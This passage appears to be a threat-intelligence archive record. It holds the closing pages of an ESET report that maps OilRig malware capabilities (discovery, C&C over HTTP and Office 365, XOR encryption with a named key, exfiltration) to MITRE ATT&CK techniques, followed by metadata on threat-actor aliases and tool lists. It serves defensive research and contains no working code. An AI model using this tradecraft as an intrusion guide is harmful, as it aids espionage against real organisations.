directory.\r\nT1033\r\nSystem Owner/User\r\nDiscovery\r\nMango obtains the victim’s username.\r\nT1087.001\r\nAccount Discovery: Local\r\nAccount\r\nOilRig’s EDumper, CDumper, and IDumper tools\r\ncan enumerate all user accounts on the\r\ncompromised host.\r\nT1217\r\nBrowser Information\r\nDiscovery\r\nMKG dumps Chrome history and bookmarks.\r\nCommand and\r\nControl\r\nT1071.001\r\nApplication Layer Protocol:\r\nWeb Protocols\r\nMango uses HTTP in C\u0026C communications.\r\nT1105 Ingress Tool Transfer\r\nMango has the capability to download additional\r\nfiles from the C\u0026C server for subsequent execution.\r\nT1001 Data Obfuscation\r\nSolar and SC5k use a simple XOR-encryption\r\nmethod along with gzip compression to obfuscate\r\ndata at rest and in transit.\r\nT1102.002\r\nWeb Service: Bidirectional\r\nCommunication\r\nSC5k uses Office 365 for downloading files from\r\nand uploading files to the Drafts directory in a\r\nlegitimate email account.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 17 of 18\n\nT1132.001\r\nData Encoding: Standard\r\nEncoding\r\nSolar, Mango, and MKG base64 decodes data\r\nbefore sending it to the C\u0026C server.\r\nT1573.001\r\nEncrypted Channel:\r\nSymmetric Cryptography\r\nMango uses an XOR cipher with the key Q\u00264g to\r\nencrypt data in C\u0026C communication.\r\nT1573.002\r\nEncrypted Channel:\r\nAsymmetric Cryptography\r\nMango uses TLS for C\u0026C communication.\r\nExfiltration T1041 Exfiltration Over C2 Channel\r\nMango, Solar, and SC5k use their C\u0026C channels for\r\nexfiltration.\r\n \r\nSource: https://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE", "Malpedia" ], "references": [ "https://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/" ], "report_names": [ "oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes" ], "threat_actors": [ { "id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4", "created_at": "2022-10-25T15:50:23.458833Z", "updated_at": "2026-04-10T02:00:05.419537Z", "deleted_at": null, "main_name": "APT34", "aliases": null, "source_name": "MITRE:APT34", "tools": [ "netstat", "Systeminfo", "PsExec", "SEASHARPEE", "Tasklist", "Mimikatz", "POWRUNER", "certutil" ], "source_id": "MITRE", "reports": null }, { "id": "cde987a8-c71f-49e2-b761-5b7fa2b4ada6", "created_at": "2022-10-25T16:07:23.706646Z", "updated_at": "2026-04-10T02:00:04.719127Z", "deleted_at": null, "main_name": "Hexane", "aliases": [ "ATK 120", "Cobalt Lyceum", "G1001", "Lyceum", "Operation Out to Sea", "Siamesekitten", "Yellow Dev 9" ], "source_name": "ETDA:Hexane", "tools": [ "DanBot", "DanDrop", "Decrypt-RDCMan.ps1", "Get-LAPSP.ps1", "James", "Milan", "kl.ps1" ], "source_id": "ETDA", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "a7df240e-6750-4b71-99de-85831b92faa2", "created_at": "2022-10-25T15:50:23.859253Z", "updated_at": "2026-04-10T02:00:05.285965Z", "deleted_at": null, "main_name": "HEXANE", "aliases": [ "Lyceum", "Siamesekitten", "Spirlin" ], "source_name": "MITRE:HEXANE", "tools": [ "Milan", "netstat", "BITSAdmin", "DnsSystem", "DanBot", "ipconfig", "Mimikatz", "Kevin", "PoshC2" ], "source_id": "MITRE", "reports": null }, { "id": "8d76e350-dfb5-4733-800d-876de41f690d", "created_at": "2023-01-06T13:46:38.841887Z", "updated_at": "2026-04-10T02:00:03.119083Z", "deleted_at": null, "main_name": "DNSpionage", "aliases": [ "COBALT EDGEWATER" ], "source_name": "MISPGALAXY:DNSpionage", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "fb8f3a5f-01a9-498e-9396-52f844424c33", "created_at": "2023-01-06T13:46:39.045338Z", "updated_at": "2026-04-10T02:00:03.195743Z", "deleted_at": null, "main_name": "LYCEUM", "aliases": [ "Spirlin", "MYSTICDOME", "siamesekitten", "Chrono Kitten", "Storm-0133", "COBALT LYCEUM", "UNC1530" ], "source_name": "MISPGALAXY:LYCEUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4632103e-8035-4a83-9ecb-c1e12e21288c", "created_at": "2022-10-25T16:07:23.542255Z", "updated_at": "2026-04-10T02:00:04.64888Z", "deleted_at": null, "main_name": "DNSpionage", "aliases": [], "source_name": "ETDA:DNSpionage", "tools": [ "Agent Drable", "AgentDrable", "CACTUSPIPE", "DNSpionage", "DropperBackdoor", "Karkoff", "MailDropper", "OILYFACE" ], "source_id": "ETDA", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "386b1b0a-9217-46d4-a0d6-73d6286154e0", "created_at": "2025-08-07T02:03:24.760429Z", "updated_at": "2026-04-10T02:00:03.619131Z", "deleted_at": null, "main_name": "COBALT LYCEUM", "aliases": [ "DEV-0133 ", "HEXANE ", "ScorchedEpoch " ], "source_name": "Secureworks:COBALT LYCEUM", "tools": [ "DanBot", "MilanRAT", "RGDoor", "SharkWork RAT" ], "source_id": "Secureworks", "reports": null }, { "id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b", "created_at": "2025-08-07T02:03:24.722093Z", "updated_at": "2026-04-10T02:00:03.681914Z", "deleted_at": null, "main_name": "COBALT EDGEWATER", "aliases": [ "APT34 ", "Cold River ", "DNSpionage " ], "source_name": "Secureworks:COBALT EDGEWATER", "tools": [ "AgentDrable", "DNSpionage", "Karkoff", "MailDropper", "SideTwist", "TWOTONE" ], "source_id": "Secureworks", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434694, "ts_updated_at": 1775792257, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5216b4cd9e4cbe88aa3fc04fe3be9081a31ed8b1.pdf", "text": "https://archive.orkl.eu/5216b4cd9e4cbe88aa3fc04fe3be9081a31ed8b1.txt", "img": "https://archive.orkl.eu/5216b4cd9e4cbe88aa3fc04fe3be9081a31ed8b1.jpg" } }